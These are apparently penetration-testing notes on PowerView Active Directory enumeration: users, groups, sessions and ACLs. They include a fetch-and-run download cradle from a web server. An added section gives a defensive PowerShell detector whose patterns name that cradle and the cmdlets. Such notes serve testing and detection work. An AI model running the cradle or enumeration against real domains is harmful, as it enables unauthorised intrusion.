PowerView

Use this when you have access to a domain-joined client with a domain user account.

Import the PowerView into memory.

PS> Import-Module .\PowerView.ps1

Or load it directly into memory from a web server:

PS> IEX (New-Object Net.WebClient).DownloadString('http://192.168.x.x/powerview.ps1')

User Enumeration

PS> Get-NetUser

PS> Get-NetUser | select samaccountname, lastlogon

# useful attributes to review
logoncount
samaccountname
lastlogon

Group Enumeration

PS> Get-NetGroup
PS> Get-NetGroup "Sales Department" | select member

# check the members for nested group membership

Computer Enumeration

PS> Get-NetComputer | select dnshostname, operatingsystem, operatingsystemversion
PS> Resolve-IPAddress client.corp.com
PS> Get-NetSession -ComputerName client2.corp.com -Verbose

ACL Enumeration

PS> Get-ObjectAcl -Identity "Management Department" | ? {$_.ActiveDirectoryRights -eq "GenericAll"}

# SID enumeration with GenericAll
PS> Get-ObjectAcl -Identity "Management Department" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier, ActiveDirectoryRights

# Convert SID to name

PS> "<SID 1>","<SID 2>","<SID 3>" | Convert-SidToName
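From the defender's side, the loading methods and the cmdlets listed above are exactly what shows up in PowerShell Script Block Logging (Microsoft-Windows-PowerShell/Operational, Event ID 4104) once it is enabled. The following is an added example, not part of the original notes or of PowerView itself: a small detection function run over constructed script-block text shaped like those events. The function name, patterns and sample lines are assumptions of this example.

```powershell
# Added example (not PowerView code): flag Script Block Logging text that matches
# the PowerView loading methods and cmdlets listed in these notes.
function Test-PowerViewIndicator {
    param([Parameter(Mandatory)][string]$ScriptBlockText)

    # Assumed indicator set, built from the commands shown on this page.
    $indicators = @(
        @{ Name = 'Download cradle';  Pattern = 'IEX\s*\(New-Object\s+Net\.WebClient\)\.DownloadString' },
        @{ Name = 'PowerView import'; Pattern = 'Import-Module\s+.*PowerView\.ps1' },
        @{ Name = 'PowerView cmdlet'; Pattern = '\b(Get-NetUser|Get-NetGroup|Get-NetComputer|Get-NetSession|Get-ObjectAcl|Convert-SidToName)\b' }
    )

    foreach ($i in $indicators) {
        if ($ScriptBlockText -match $i.Pattern) {
            [pscustomobject]@{ Indicator = $i.Name; Match = $Matches[0] }
        }
    }
}

# Constructed sample script blocks, shaped like the text part of 4104 event messages.
$samples = @(
    "IEX (New-Object Net.WebClient).DownloadString('http://192.168.x.x/powerview.ps1')",
    'Import-Module .\PowerView.ps1',
    'Get-NetUser | select samaccountname, lastlogon',
    'Get-Process | Where-Object { $_.CPU -gt 100 }'   # benign admin command, must not match
)

foreach ($s in $samples) {
    $hits = @(Test-PowerViewIndicator -ScriptBlockText $s)
    if ($hits.Count -gt 0) {
        Write-Output ("ALERT: {0} -> {1}" -f $s, ($hits.Indicator -join ', '))
    } else {
        Write-Output ("ok:    {0}" -f $s)
    }
}

# Against live logs instead of the constructed samples (requires Script Block Logging enabled):
# Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } |
#     ForEach-Object { Test-PowerViewIndicator -ScriptBlockText $_.Message }
```

Renamed copies of PowerView will not match the cmdlet pattern, so treat this as a first filter and pair it with the 4104 event volume from unexpected hosts rather than relying on it alone.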
